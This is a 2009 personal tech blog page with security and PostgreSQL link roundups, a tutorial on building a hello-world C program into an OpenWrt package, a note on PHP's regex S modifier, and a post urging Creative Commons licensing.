Via certifiedbug.com: Spybot Search & Destroy competitors are trying to force its removal – what this article doesn’t talk about is that Spybot S&D is basically a hobbyist tool with very low efficiency. It made a name for itself back in the days, when the malware problem was much smaller, but these days all respectable Anti-Malware solutions include an anti-spyware module (including the free-for-personal use ones like AVG), so you don’t need a separate program for it. A further proof of Spybot’s “hobbyist” status is the sub-optimal method it uses to block domains (essentially putting them in the “restricted zone” for IE – which can cause performance problems for IE8 and is mostly ineffective if you are using other browsers).

On the Errata Security blog we have more details about the recent Core IP FBI raid. It is sad (frightening?) that because of one suspected customer they felt that they have to take all those servers. I guess that “international” infrastructure, like EC2, with datacenters in different jurisdictions. Probably criminals will also catch one and make the work of law enforcement harder...

Via the hexale blog: The Java Virtual Machine As Shellcode – ok, a nice technological demo, but why not just build on top of metasploit? A 4.5MB agent? Really?

From the F-Secure blog: Understanding the Spreading Patterns of Mobile Phone Viruses [PDF]. Mostly pretty pictures and a fairly obvious conclusion: Bluetooth malware spread slower than MMS malware.

From the Google Tech Talks (there are some very cool gems there!): The Value of Informed Choice in Protecting Consumers, a Product, and a Company – an inspiring presentation. We need more business leaders like this. Favorite quote: "When you put it in the hand of marketing people, you are in deep trouble."

It seems that the Google App Engine will start supporting Java soon.

An other AV false positive issue: AntiVir, Tor Browser Bundle, and trojan Dropper.Gen false positive. Fortunately Avira has a functional interface for reporting false positives, and, according to the reply, it will resolved with the next signature update.

I too saw yesterday the post from SANS about PHP interpreting .php.bak files for example. The Computer Defense blog raises some issues: it seems that this is not true in all the cases, although it is true in many of them. Here are some relevant links / quotes from the Apache documentation:

  • AddType Directive: “Filenames may have multiple extensions and the extension argument will be compared against each of them.”
  • Files with Multiple Extensions: “If you would prefer only the last dot-separated part of the filename to be mapped to a particular piece of meta-data, then do not use the Add* directives. For example, if you wish to have the file foo.html.cgi processed as a CGI script, but not the file bar.cgi.html, then instead of using AddHandler cgi-script .cgi, use...” (see the documentation for the example)

Via the terminal23.net blog:

According to the Department's [the quote is about the USA DoD] own analysis, nearly 70% of the network traffic leaving the Department through a single one of its Internet gateways during the month of January 2008 was bound for known hostile countries and the Department lacked the capability to even determine what the traffic was.

It seems that as companies / organizations grow, they loose their ability to secure data exponentially.

Compiling software for OpenWrt (and creating packages)

3 comments

2726596365_66a64212fb_b From my experience, compiling software is not especially hard, but most of the tutorials out there are somewhat dated (as this one will be in 6-7 months). But at least until then it can be useful, and hopefully I will find the time to update it later on. I’m using the trunk version of OpenWrt, which a little more up-to-date than 8.09, but most probably everything described here works with 8.09 (the latest release).

I’ve taken inspiration from the following sources:

The main ideas would be:

  • The easiest way to start is by copying an existing makefile and editing it to fit your needs
  • OpenWrt has an advanced build system which does all the following things:
    • Download the application from its original source (and verify the integrity of the archive using md5sum)
    • Apply some local patches to it
    • Configure / build it
    However, for local development you most likely won't need this. An alternative solution (which will be used in the tutorial later on) would be to copy the source to the build directory in the preparation faze.
  • Makefiles are very sensitive to tabs (so you have to have tabs and not 4 or 8 spaces in certain locations) and also, errors in them are very cryptic (for example "missing separator"). If your build fails, the first thing you should check is that you have your tabs in order. Also verify that your editor doesn’t have some kind of “transform tabs to spaces” option active. For example, if you are using mcedit with the default color-scheme, it will highlight correct tabs in red, as can be seen in the screenshot below.
    mcedit_openwrt_package Also, you might have observed that not all the sections use tabs, some are ok with spaces. However rules for which section should use what are not clear to me, so my recommendation is to stick with tabs everywhere. For a quick make tutorial, you can check out this site. A last word of warning on this matter: copy-pasting from this blogpost will almost certainly mess things up (convert tabs to spaces, etc), so please double check the source after copying it.

Our goal (taken from the first linke tutorial) is to get the following little C program to compile and run:


/****************
* Helloworld.c
* The most simplistic C program ever written.
* An epileptic monkey on crack could write this code.
*****************/
#include <stdio.h>

int main(void)
{
 printf("Hell! O' world, why won't my code compile?\n\n");
 return 0;
}

The first step is to create a Makefile for it:


# build helloworld executable when user executes "make"
helloworld: helloworld.o
 $(CC) $(LDFLAGS) helloworld.o -o helloworld
helloworld.o: helloworld.c
 $(CC) $(CFLAGS) -c helloworld.c

# remove object files and executable when user executes "make clean"
clean:
 rm *.o helloworld

Place the files in the packages/helloworld/src directory of either the checked-out OpenWrt source or the Openwrt SDK. Now change into this directory and make sure that everything builds on our local system (without the crosscompiling magic):


make
./helloworld <-- this should output the message
make clean   <-- clean up after ourselves

Now to create the openwrt makefile. This will be located one level up (ie. packages/helloworld/Makefile):


#
# Copyright (C) 2008 OpenWrt.org
#
# This is free software, licensed under the GNU General Public License v2.
# See /LICENSE for more information.
#
# $Id$

include $(TOPDIR)/rules.mk

PKG_NAME:=helloworld
PKG_RELEASE:=1

include $(INCLUDE_DIR)/package.mk

define Package/helloworld
 SECTION:=utils
 CATEGORY:=Utilities
 TITLE:=Helloworld -- prints a snarky message  
endef

define Build/Prepare
 mkdir -p $(PKG_BUILD_DIR)
 $(CP) ./src/* $(PKG_BUILD_DIR)/
endef

define Build/Configure
endef

define Build/Compile
 $(MAKE) -C $(PKG_BUILD_DIR) $(TARGET_CONFIGURE_OPTS)
endef

define Package/helloworld/install
 $(INSTALL_DIR) $(1)/bin
 $(INSTALL_BIN) $(PKG_BUILD_DIR)/helloworld $(1)/bin/
endef

$(eval $(call BuildPackage,helloworld))

The makefile should be pretty self-explanatory. A couple things I would like to highlight:

  • Build/Prepare is the step where we copy our source-code to the build directory. This is a hack to circumvent the need of downloading the tgz file, but it is a hack which works well (you might want to add the –r switch to cp if you have nested directories in src – this isn’t the case for this simple example)
  • In the Build/Compile step it is very important to include the $(TARGET_CONFIGURE_OPTS) part. Without it, the thing will build, but it will link with the standard libc, rather than the ulibc available on the Openwrt router. Tracking down this error is made harder by the unintuitive error messages. Specifically, you will see something like this on your router: “/bin/ash: The command /bin/helloworld can not be found”, even though you see that the file exists and it has execute permissions! To verify that your issues are caused by this problem, simply too a “less /bin/helloworld” on your router and check to see if you have strings indicating glibc (instead of ulibc).

Now you are ready to compile:

  • If you are using the SDK, simply go to its root directory and issue the make V=99 command
  • If you are building the complete tree, you have to first do “make menuconfig”, make sure that your package is checked for build (you should see the letter M near it) and then issue make V=99. Be aware that compiling the full tree can take a considerable time (more than a hour in some cases).

Your package should now be ready. Copy the package (you will find it in the bin/packages/target-... subfolder) to your router (or better yet, a Qemu VM running OpenWrt – for safety) and test that everything works:


scp helloworld.ipkg root@router:/root
[root@router]# opkg install helloworld.ipkg
[root@router]# helloworld <-- the message should be printed

This would be all :-). Because of simplicity, this tutorial doesn’t cover the the calling of configuration scripts. Also, as far as I’ve seen, there is no easy way to include parts of other projects. For example, if I wish to create a package for LuaFileSystem, I would need lua.h (and some other, related files). However, I haven’t found an easy way reference it from the lua package, and have opted for putting a local copy in the src/lua subdirectory.

Picture taken from cantrell.david's buddy icon with permission.

Tuesday, April 07, 2009

Old habits die hard

1 comments

497092818_3c86edbcca_b Last year I complained about ParetoLogic being a sponsor for the 2008 Virus Bulleting conference. It seems that my concerns were at least partially justified: as this post from the ESET blog points it out, they are back to using overhyped and inaccurate text in their advertisements, much like the rogue security products.

Picture taken from Navin75's photostream with permission.

Mixed links

1 comments

150634259_979370781d_o Found this via the Database Soup blog: the PostgreSQL channel on vimeo – a couple (and hopefully more to come) videos on PostgreSQL.

A relatively long discussion about some AV’s having a false detection for VirtualDub. It is useful in the sense that you can see the (mis)conceptions people have about the matter.

Originally I wasn’t going to comment on this, but I just can’t take it: Bill Pytlovany, who with I had run-ins before, posted what I consider to be a joke of very poor taste. Since than he has taken it down, but you can still see it in the Google cache. Now, I haven’t made up my mind on the Tibet issue either way (I didn’t have time to study in-depth enough to say that I have an informed opinion), but using it in a joke is disrespectful either way.

From the Database Geek blog: Playstations 2 will be available for under 100 USD – w00t, an other cheap device to run Linux on!

From Oraclenerd: Unskilled and Unaware of It [PDF]. A very sad (or frightening, depending on how you look at it) article explaining that most people are the more likely to overestimate they capabilities as their knowledge in the area shrinks.

From a SUN blog: Effects of Flash/SSD on PostgreSQL - PostgreSQL East 2009. Of course this is from a SUN employee and SUN sells SSD’s for servers, but still an interesting read.

On the zillablog we have a presentation about the new features to come in PostgreSQL 8.4. Very cool, and we have very little until it is released (it should be released on the 1st of May if everything goes well):

From a good friend of mine (even though he uses Wordpress :-P): Top ten striptease songs.

From taint.org: Creator of Cyc reviews Wolfram Alpha. Very cool (also, I haven’t heard about cyc until now, so it was interesting also from that point of view). Also from taint.org: on url shorteners, which mentions a site having quite a large list with URL shortening services (might come in handy some day).

From the Old New Thing blog: Windows 95 almost had floppy insertion detection but the training cost was prohibitive and the follow up – very interesting to know that floppy drives had the capability of detecting (and signaling) the presence of disks without spinning them up. I just wonder: does this apply to both 3” and 5.25” floppy drives? :-)

Detecting event support without browser sniffing – browser sniffing is bad, and this is a cool thing.

Comparison between the different mobile appstores

NAS Troubleshooting via the Back Door – yes, web interfaces for such equipment is quite insecure. On a similar note, I started looking at CGILua and noted several security problems at the first glance (using a very small space for session id’s, not always checking the passed in session id, being prone to truncating strings due to NUL characters – although that might have been because of mini-httpd, I didn’t check the details).

Via the virus blog: Circos, an interesting looking visualization method which can be useful in some cases.

From the Reverse Engineering Reddit: ZIP Attacks with Reduced Known-Plaintext – oldie, but goodie. The problem with the ZIP format is that there are too many variations out there, and you can never be sure what a program means when it says that it supports “ZIP encryption”.

A cool way to geolocate the client – unfortunately it doesn’t always work.

Dealing with those pesky “unnamed” threats – an other explanation of why whitelisting is better than blacklisting if you can afford it.

A Quick Survey on Intermediate Representations for Program Analysis – should be interesting for reverserser / decompiler (or other analysis tool) authors.

The MSHTML Host Security FAQ: Part I of II and Part II. Interesting, but the fact that most options are opt-in for backward compatibility reasons (I assume), so existing applications won’t take advantage of them :-(.

Via the <?PHPDeveloper blog: 5 cool things you can do with windows and php – mostly WMI invocations.

A quote from the HolisticInfoSec blog:

The difference is that... IF... you own, and run, your own servers, or systems/software... AND, a "common vulnerability" exists, and is exploited... You MAY be vulnerable... you MAY have a security issue... you MAY be targeted... you MAY not have adequately protected your system... you MAY be hit by the problem... you MAY have issues, and losses... possibly.
If, however, you are dependent upon any, EXTERNAL, single point-of-attack/vulnerable-point... then you WILL be hit... you WILL be affected... you WILL have losses... and you WILL be totally-dependent upon EXTERNAL-interests in "fixing", and recovering... based upon THEIR competence, and on THEIR time-table... and, to suit THEIR perception of THEIR interests.
In other words, ALL YOUR EGGS in [SOMEONE ELSES] basket.

From games.slashdot.org: a new version (2.5) of Nexuiz, an open-source FPS game, has been released. It looks good, and for an Unreal 2003 fan like me, is very good (OpenArena looked a little too cartoonish for my taste). With the previous version (2.4) I had some negative experience of Ubuntu, and 2.5 isn’t the repos yet. It also seems that they are implementing some interesting anti-cheat mechanisms.

Common Apache Misconception – an important catch of the standard Apache/PHP (and possibly other scripting engines) configuration.

This is funny, even if you don’t follow Formula 1:

From the Google Code blog: Google Code Blog: AJAX APIs Playground Ver. 2 – some very cool updates. The Firebug Lite integration is especially nice!

From the the Mailinator(tm) Blog I found my way to this post: Thread per connection : NIO, Linux NPTL and epoll which asserts that the Java NIO (New IO) is actually slower on modern systems than the old model, which highlights the need to profile before “optimizing” your code. A similar post/video: Java Performance Myths. Again, measure twice, cut once.

Picture taken from MinivanNinja's photostream with permission.

Optimizing regular expressions with PHP

0 comments

2372872685_5e35d92617_o I was intrigued by the following text in the PHP reference, especially because there is considerable regex use in the wehoneypot project:

S When a pattern is going to be used several times, it is worth spending more time analyzing it in order to speed up the time taken for matching. If this modifier is set, then this extra analysis is performed. At present, studying a pattern is useful only for non-anchored patterns that do not have a single fixed starting character.

My questions were: (a) what exactly does it mean by “using”, since PHP doesn’t have the concept of “compiling” regular expressions like other languages have and (b) in which cases are these optimizations useful?

The first useful information about the issue I found on stackoverlow, where a comment by EBGreen mentioned the book “Mastering Regular Expressions” by Jeffrey Friedl. You can take a peek into the book using books.google.com. Starting with page 478 it discusses efficiency issues in PHP, including the S modifier. A quote from it:

Currently, the situations where study can and can’t help are fairly well defined: it enhances what Chapter 6 calls the initial class discrimination optimization.

This is essentially the same as the explanation from the manual, however it also gives an example which makes the issue clearer:

Let’s say that you have the regex /0x[a-f0-9]+/i. It is pretty clear that a match is possible in the string where we find a zero, and it makes no sense for the regex engine to try matching in other places (and in fact, it doesn’t). However, if we have an expressions like the following /<i>|<b>|<em>/i, it is still clear to the human observer that only places containing “<” can be a starting point for the match, however the regex engine doesn’t know this, unless the S flag is specified and it has the chance to perform some analysis on the regex.

Now lets put some relative numbers to this explanation: I used preg_match_all with an expression similar to the second one in a loop to extract all the matches from from a ~20MB string 10 000 times. However the variation was less than 2% (in absolute terms this would mean less than 2 seconds on my machine – this also falls below the statistically significant threshold, since between different runs was ~50%). Given that most applications do far fewer calls to the PCRE library on much shorter strings, the S modifier for the moment doesn’t seem have a noticeable performance impact.

Finally, here is an interesting presentation about writing a compiler for PHP from the Google Tech-Talks collection:

Picture taken from Geek&Poke's photostream with permission.

Monday, April 06, 2009

Learning is never done

1 comments

2500281256_537ee792bd_b I’ve been using PHP for a while now and thought that I knew the available functions (at least the generic ones) pretty well, but recently I got surprised: a recent entry on the Me and My Database blog pointed me towards http_build_query and in the same category I found parse_url. This is significant to me, since I used some hacked-up regular expression to do the same in the webhoneypot. So I ripped out my regex and replaced it with parse_url. There are at least three advantages to using built-in functions:

  • they are fast
  • they are probably better tested than your code
  • your code will be shorter (and less to maintain for you)

So next time you want to do something, take a look around, maybe there is a PHP function which already does what you want (or almost what you want). Admittedly, the organization (naming) of the functions is not always the most consistent, intuitive one, but the searching effort is well worth it.

Picture taken from triplezero's photostream with permission.

License your work!

1 comments

234480877_e74efefbee_o This post was inspired by the “I’m a creative commoner” post of the dammit.lt blog. Disclaimer: IANAL – I Am Not A Lawyer.

Why should you license your work?

  • because it makes clear under what conditions can it be reused / quoted / etc
  • because it is more probably that others will use it and use it in a way you are comfortable with
  • because if you have to enforce your license (think of splogs), you have clear terms others have to comply with
  • because choosing one license doesn’t mean that you can’t change it in the future (if you are the sole copyright holder of the material or if all copyright holders agree, the work can be relicensed – also the same material can be licensed under different licenses in the same time)
  • even if you don’t specify a license, there are implied rights (given by the fact that you made your work public) and a license can help clarify the issues

Why use creative commons?

  • because it is a well understood license and the compatibility between it and other licenses has been largely explored
  • because there is an organization behind it, which can help you with legal matters
  • because it has variants to cover almost all possible cases (do you want attribution? do you want to permit derivative works? etc)
  • because it is much more likely to hold up in a court of law, should it ever be challenged, than a home-grown license
  • because there is a whole lot of material out there already under a CC license, which makes can be reused by you (for example the pictures attached to my blogposts are all under a CC license)

PS. All work on this blog – unless explicitly specified otherwise - is licensed under a Creative Commons Attribution-Share Alike 3.0 Unported License.

Picture taken from Jayel Aheram's photostream with permission.